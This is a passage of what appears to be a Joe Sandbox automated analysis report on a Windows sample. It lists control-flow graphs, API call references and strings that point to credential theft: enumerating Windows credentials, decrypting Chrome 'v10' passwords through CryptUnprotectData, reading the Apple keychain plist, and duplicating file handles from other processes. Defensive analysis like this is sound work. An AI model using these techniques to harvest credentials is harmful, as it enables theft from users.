40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 82 445fae-445fb2 60->82 83 445d2b-445d3b 60->83 160 445cf5 61->160 161 445cfc-445d03 61->161 64->19 75 445884-44589d call 40a9b5 call 4087b3 65->75 143 445849 66->143 249 445c77 67->249 68->67 76 445ba2-445bcf call 4099c6 call 445403 call 445389 68->76 148 44589f 75->148 76->53 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 110 4456ba-4456c4 78->110 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 193 445e17 99->193 194 445e1e-445e25 99->194 123 4457f9 110->123 124 4456ca-4456d3 call 413cfa call 413d4c 110->124 123->6 174 4456d8-4456f7 call 40b2cc call 413fa6 124->174 140->141 141->23 143->51 145->146 146->30 148->64 150->78 150->93 156->110 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->60 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 193->194 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 194->198 199 445e6b-445e7e call 445093 194->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->44 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 254 445f9b 220->254 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->53 254->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                              • API String ID: 1963886904-3798722523
                                                                                                                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                              • API String ID: 2744995895-28296030
                                                                                                                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                              • String ID: chp$v10
                                                                                                                                                              • API String ID: 1297422669-2783969131
                                                                                                                                                              • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                              • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                                              • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                              • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                              • String ID: bhv
                                                                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                              • API String ID: 2941347001-70141382
                                                                                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
